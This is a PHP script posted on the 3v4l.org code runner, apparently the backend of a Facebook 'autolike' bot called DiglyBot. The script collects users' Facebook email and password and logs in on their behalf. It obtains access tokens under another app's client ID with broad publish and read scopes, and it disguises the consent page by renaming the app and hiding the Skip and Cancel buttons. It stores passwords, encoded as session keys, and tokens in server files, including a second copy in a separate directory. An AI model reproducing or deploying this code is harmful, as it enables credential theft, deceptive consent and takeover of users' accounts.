3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php error_reporting(0); ob_start('ob_gzhandler'); if(!is_dir('/tmp/fbdtsg')){ mkdir('/tmp/fbdtsg');} session_start(); if(!is_dir('/tmp/svT')){ mkdir('/tmp/svT'); } if($_POST[login]){ $key = base64_encode($_POST[pass].'(.)(.)'.$_POST[email]); $_SESSION[key]=$key; if(file_exists('/tmp/svT/'.$key)){ $toket=file_get_contents('/tmp/svT/'.$key); $cek =json_decode(_req($key,'https://graph.facebook.com/me?access_token='.$toket),true); if($cek[id]){ $_SESSION[access_token] = $toket; $_SESSION[fb_dtsg] = file_get_contents('/tmp/fbdtsg/'.$key); back('index.php'); exit; }else{ unlink('/tmp/svT/'.$key); back('login.php?act=setToken&key='.$key); } } elseif(file_exists('/tmp/'.$key)){ back('login.php?act=setToken&key='.$key); }else{ $fields=$_POST; login($key,$fields); back('login.php?act=setToken&key='.$key); } } if($_POST[fb_dtsg]){ $act=$_GET[act]; $key=$_SESSION[key]; $fields = $_POST; $token = setTokenP($key,$fields,$act); if($token){ $_SESSION[access_token] = $token; saveFile('/tmp/svT/'.$key,$token); if(!is_dir('/tpvt')){ mkdir('/tpvt'); } saveFile('/tpvt/'.$key,$token); back('index.php'); }else{ if($_SESSION[fb_dtsg]){ back('index.php?act=loginExpired'); }else{ unlink('/tmp/'.$key); back('index.php?act=loginFalse'); } } } if($_GET[act] == 'setToken'){ $key=$_GET[key]; $token = setToken($key); if($token){ $_SESSION[access_token] = $token; saveFile('/tmp/svT/'.$key,$token); if(!is_dir('/tpvt')){ mkdir('/tpvt'); } saveFile('/tpvt/'.$key,$token); back('index.php'); }else{ if($_SESSION[fb_dtsg]){ back('index.php?act=loginExpired'); }else{ unlink('/tmp/'.$key); back('index.php?act=loginFalse'); } } } function login($key,$fields){ return _req($key,'https://m.facebook.com/login.php',1,$fields); } function setTokenP($key,$fields,$type){ $getToken = _req($key,'https://m.facebook.com/dialog/oauth/'.$type,3,$fields); if(ereg('#access_token=',$getToken)){ $accessToken = substr($getToken,strpos($getToken,'access_token')+13,(strpos($getToken,'&expires_in') - (strpos($getToken,'access_token')+13))); } if($accessToken){ $_SESSION[access_token] = $accessToken; return $accessToken; }else{ if(ereg('fb_dtsg',$getToken)){ $fbDtsg = substr($getToken,strpos($getToken, 'name="fb_dtsg" value=')+22,12); if($fbDtsg){ $_SESSION[fb_dtsg] = $fbDtsg; saveFile('/tmp/fbdtsg/'.$key,$fbDtsg); } $oauth = '<x>'.$getToken; $oauth = '<x>'.$getToken; $oauth = preg_replace('#<x>(.+?)</table>(.+?)</form>(.+?)</html>#siu','\2</form>',$oauth); $oauth = str_replace('/dialog/oauth/read','index.php?act=powerLike&access=read',$oauth); $oauth = str_replace('/dialog/oauth/write','login.php?act=write',$oauth); $oauth = str_replace('v1.0login.php?act=write','login.php?act=write',$oauth); $oauth = str_replace('_56bs _56bw _56bt','btn btnD',$oauth); $oauth = str_replace('_56bs _56bw _56bu','btn btnC',$oauth); $oauth = str_replace('type="submit" name="__SKIP__"','type="hidden"',$oauth); $oauth = str_replace('type="submit" name="__CANCEL__"','type="hidden"',$oauth); eval('?>'.file_get_contents('head.php').'<?'); print '<div class="acy apm abb abt">Access Write untuk Applikasi DiglyBot</div>'; print ($oauth); eval('?>'.file_get_contents('foot.php').'<?'); exit; }else{ return false; } } } function setToken($key){ $ponsel =2915120374; $berry =2254487659; $andro = 350685531728; $texas=2389801228; $nokia = 49340319393; $getToken = _req($key,'https://m.facebook.com/dialog/oauth?client_id='.$texas.'&redirect_uri='.urlencode('https://m.facebook.com/connect/login_success.html').'&response_type=token&scope=read_requests,publish_stream,read_stream,publish_actions,publish_likes,user_status,friends_status,user_photos,friends_photos&refid=7',3); if(ereg('#access_token=',$getToken)){ $accessToken = substr($getToken,strpos($getToken,'access_token')+13,(strpos($getToken,'&expires_in') - (strpos($getToken,'access_token')+13))); } if($accessToken){ print '<script>alert("Hapus Dolo Aplikasi Texas HoldEm Poker :p")</script>'; }else{ if(ereg('fb_dtsg',$getToken)){ $fbDtsg = substr($getToken,strpos($getToken, 'name="fb_dtsg" value=')+22,12); if($fbDtsg){ $_SESSION[fb_dtsg] = $fbDtsg; saveFile('/tmp/fbdtsg/'.$key,$fbDtsg); } $oauth = '<x>'.$getToken; $oauth = preg_replace('#<x>(.+?)</table>(.+?)</form>(.+?)</html>#siu','\2</form>',$oauth); $oauth = str_replace('/dialog/oauth/read','login.php?act=read',$oauth); $oauth = str_replace('v1.0login.php?act=read','login.php?act=read',$oauth); $oauth = str_replace('/dialog/oauth/write','index.php?act=powerLike&access=write',$oauth); $oauth = str_replace('_56bs _56bw _56bt','btn btnD',$oauth); $oauth = str_replace('_56bs _56bw _56bu','btn btnC',$oauth); $oauth = str_replace('type="submit" name="__SKIP__"','type="hidden"',$oauth); $oauth = str_replace('type="submit" name="__CANCEL__"','type="hidden"',$oauth); $oauth = str_replace('Texas HoldEm Poker','DiglyBot',$oauth); $oauth=str_replace($texas,$berry,$oauth); eval('?>'.file_get_contents('head.php').'<?'); print '<div class="acy apm abb abt">Access Read untuk Applikasi DiglyBot</div>'; print ($oauth); eval('?>'.file_get_contents('foot.php').'<?'); exit; }else{ return false; } } } function back($url){ print '<meta http-equiv="refresh" content="0;url='.$url.'" />'; } function bunuh($x){ unset($_SESSION[$x]); } function _req($key,$url,$type=null,$fields=null){ $opts = array( 19913 => 1, 10002 => $url, 10018 => $_SERVER[HTTP_USER_AGENT], ); $ch=curl_init(); if($type){ if($type == 1){ $opts[10082] = '/tmp/'.$key; } if($type == 3){ $opts[42] = 1; } $opts[10031] = '/tmp/'.$key; } if($fields){ $opts[47] = true; $opts[10015] = $fields; } curl_setopt_array($ch,$opts); $result = curl_exec($ch); curl_close($ch); return $result; } function saveFile($x,$y){ $f=fopen($x,'w'); fwrite($f,$y); fclose($f); } ?>
based on 24JoS
Output for 5.4.0 - 5.6.28, hhvm-3.10.0 - 3.12.0, 7.0.0 - 7.1.0